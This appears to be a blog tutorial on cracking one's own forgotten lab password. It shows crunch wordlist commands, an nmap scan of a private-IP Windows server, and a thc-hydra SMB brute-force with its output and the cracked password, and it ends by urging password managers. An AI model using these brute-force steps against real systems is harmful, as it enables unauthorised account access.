One of Us
So you’ve forgot your password. Congratulations! There’s nothing wrong with it and it happens way more often than you think. Of course, you could take care of everything in advance and set up one of the password managers so it could do everything for you, but you’re too busy for this, right?
I use Lastpass for many years now, but regularly I have to create temporary passwords for lab virtual machines, lab routers or even applications that I do not plan to use later anyway.
Well, it looks like we don’t have a choice here – let’s guess or simply crack our own password.
We’ll need two tools: thc-hydra and crunch. We’ll also use the nmap scanner, but it is worthy of it’s own article.
Young psychic toolkit
What do we know about Hydras? Well we know for sure that it inhabits swamps, has an attack of 16 and defense of 18, and deals damage to all surrounding creatures.
No, not that Hydra.
thc-hydra Is the most popular tool for cracking passwords with dictionary. About 50 protocols are supported, including the most popular like RDP, SSH, FTP, HTTP, SMB.
Crunch is a tool for creating dictionaries according to the given parameters. Of course, we know that with sufficient complexity and the length of the password it’s meaningless to guess it. Random 10-character password is immune to guessing. However, the brutal truth of life is that most users:
a) Choose simple passwords.
b) If there are any complexity requirements to the password, they’ll choose the base of the password, and then finish it with special characters to the desired type.
For example, the user can define “mypassword” as the base and then make it “complex” if he is required to – “%mypassword1A”, “Aamypassword<,!”, “Bmypassword* (“, and so on.
Let’s pretend that I know this base for my temporary passwords (for sure I do!), so the first step is to create our own password dictionary.
To create a dictionary, we’ll need a crunch utility. It has a quite simple syntax so the easiest way to understand it is with examples. Take a look:
crunch 2 6 qrs347
With this command we will create a dictionary of words with length from 2 to 6 characters containing symbols q, r, s, 3,4 and 7 in all possible combinations. Now a little bit more complicated example:
crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ -t @@@@1980 -o wordlist.txt
With this command, we’ll create a dictionary of 8-character words, where there will be words according to the pattern: 4 any characters from the specified set, and then “1980”. And then you save the entire dictionary as a text file wordlist.txt.
We can experiment with parameters: exclude duplicate characters, change the order of words in the dictionary, create more complex word patterns, etc.
For our case the command will be:
crunch 14 14 -t @@mypassword@@ -f /usr/share/crunch/charset.lst lalpha-numeric-symbol14 -o mypassword.txt
Here we create a dictionary of words with a length of 14 characters by pattern: 2 characters, then the base “mypassword”, then 2 more characters. All the characters are from file charset.lst. The resulting dictionary will be stored in a file mypassword.Txt
Well, let’s hack ourselves now
thc-hydra has to 2 major operation modes: using a dictionary or using a bruteforce. Strictly speaking, in the bruteforce mode thc-hydra generates dictionaries on the fly. The same dictionary that we made a minute ago with crunch. I prefer to use dictionaries, as it allows to break complex tasks into stages.
I’m sure our user name is Administrator, and we only have to guess his password.
Let’s start by figuring out which services are running on our server (192.168.70.128). It is necessary to find out to understand what door should we knock. nmap gives us everything:
nmap -sV -T4 192.168.70.128 Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 46.15% done; ETC: 11:30 (0:00:42 remaining) Nmap scan report for 192.168.70.128 Host is up (0.000080s latency). Not shown: 987 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 80/tcp open http Microsoft IIS httpd 8.5 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 3389/tcp open ssl Microsoft SChannel TLS 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC
We can choose anything from here – FTP, HTTP, SMB and even RDP. In terms of thc-hydra it is almost the same, and the syntax of further commands will be similar. For example, using SMB:
hydra -l administrator -P mypassword.txt -t 1 192.168.70.128 smb Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2018-03-15 11:58:04 [DATA] max 1 task per 1 server, overall 1 task, 6250000 login tries (l:1/p:6250000), ~6250000 tries per task [DATA] attacking smb://192.168.70.128:445/ [smb] host: 192.168.70.128 login: administrator password: aamypasswordaz 1 of 1 target successfully completed, 1 valid password found
Now we got it – Aamypasswordaz is our password. Pretty easy, right?
It is obvious that individual services are more susceptible to these attacks than the other. For example, if you enable Network Level Authentication for RDP, the task becomes almost impossible. However, we used nmap for a reason – potential attacker will look for the easiest way to access. If there are narrow windows of RDP and HTTP, they can be ignored by passing through the front door of SMB.
The syntax of specific commands for different protocols will be, of course, different, and in general this type of attack has a lot of nuances, but this example shows how easy it is to organize such an attack, and that it is available to people even with very low training.
So use password managers and do not neglect the best practices.